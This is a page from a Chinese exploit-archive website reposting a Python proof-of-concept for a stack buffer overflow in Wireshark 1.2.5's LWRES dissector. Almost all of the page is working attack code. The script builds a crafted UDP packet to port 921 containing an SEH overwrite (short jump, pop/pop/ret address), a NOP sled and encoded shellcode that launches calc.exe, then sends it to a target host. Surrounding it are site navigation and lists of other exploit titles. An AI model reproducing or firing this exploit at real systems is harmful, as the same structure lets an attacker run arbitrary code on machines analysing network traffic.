首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Wireshark 1.2.5 LWRES getaddrbyname BOF - calc.exe
来源:vfocus.net 作者:Nullthreat 发布时间:2010-02-22  

#!/usr/bin/env python
# Wireshark 1.2.5 LWRES getaddrbyname stack-based buffer overflow
# Discovered by babi
# Reference: http://www.exploit-db.com/exploits/11288
# Exploit Dev by Nullthreat & Pure|Hate

import socket, sys

try:
  host = sys.argv[1]
except:
  print "usage: " + sys.argv[0] + " <host>"
  exit(2)

port = 921
addr = (host, port)

leng = 9150
high = int(leng / 256)
low = leng & 255

crash = ("A" * 2128)

# Short jump
jmp = "\x90\x90\x06\xeb"

# pop/pop/ret in pcre3 0x61b4121b
ppr = "\x1b\x12\xb4\x61"

nop  = ("\x90" * 24)

# 224 bytes = calc.exe
shellcode = (
"\xbf\x86\x0a\x33\xa0\x2b\xc9\xda\xd9\xd9\x74\x24\xf4\xb1"
"\x32\x5e\x31\x7e\x11\x03\x7e\x11\x83\xc6\x82\xe8\xc6\x5c"
"\x62\x65\x28\x9d\x72\x16\xa0\x78\x43\x04\xd6\x09\xf1\x98"
"\x9c\x5c\xf9\x53\xf0\x74\x8a\x16\xdd\x7b\x3b\x9c\x3b\xb5"
"\xbc\x10\x84\x19\x7e\x32\x78\x60\x52\x94\x41\xab\xa7\xd5"
"\x86\xd6\x47\x87\x5f\x9c\xf5\x38\xeb\xe0\xc5\x39\x3b\x6f"
"\x75\x42\x3e\xb0\x01\xf8\x41\xe1\xb9\x77\x09\x19\xb2\xd0"
"\xaa\x18\x17\x03\x96\x53\x1c\xf0\x6c\x62\xf4\xc8\x8d\x54"
"\x38\x86\xb3\x58\xb5\xd6\xf4\x5f\x25\xad\x0e\x9c\xd8\xb6"
"\xd4\xde\x06\x32\xc9\x79\xcd\xe4\x29\x7b\x02\x72\xb9\x77"
"\xef\xf0\xe5\x9b\xee\xd5\x9d\xa0\x7b\xd8\x71\x21\x3f\xff"
"\x55\x69\xe4\x9e\xcc\xd7\x4b\x9e\x0f\xbf\x34\x3a\x5b\x52"
"\x21\x3c\x06\x39\xb4\xcc\x3c\x04\xb6\xce\x3e\x27\xde\xff"
"\xb5\xa8\x99\xff\x1f\x8d\x55\x4a\x3d\xa4\xfd\x13\xd7\xf4"
"\x60\xa4\x0d\x3a\x9c\x27\xa4\xc3\x5b\x37\xcd\xc6\x20\xff"
"\x3d\xbb\x39\x6a\x42\x68\x3a\xbf\x21\xef\xa8\x23\xa6\xe5"
)

crash2 = ("\xcc" * 6752)

data  = "\x00\x00\x01\x5d\x00\x00\x00\x00\x4b\x49\x1c\x52\x00\x01\x00\x01"
data += "\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00"
data += "\x00\x00\x00\x01"
data += chr(high) + chr(low) + crash + jmp + ppr + nop  + shellcode + crash2 + "\x00\x00"

udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
  udps.sendto(data, addr)
except:
  print "can't lookup host"
  exit(1)

udps.close()
exit(0)


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·NovaPlayer 1.0 (.mp3) Local De
·Internet Explorer (6/7) Remote
·Internet Explorer 8 (Multitudi
·Ollydbg 2.00 Beta1 Local Buffe
·Mozilla Firefox 3.6 (Multitudi
·Apple Iphone/Ipod - My DBLite
·Browser address bar characters
·Easy~Ftp Server v1.7.0.2 Post-
·Hyleos ChemView v1.9.5.1 Activ
·Easy~Ftp Server v1.7.0.2 Post-
·Open & Compact FTPd Pre-Authen
·Easy~Ftp Server v1.7.0.2 Post-
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved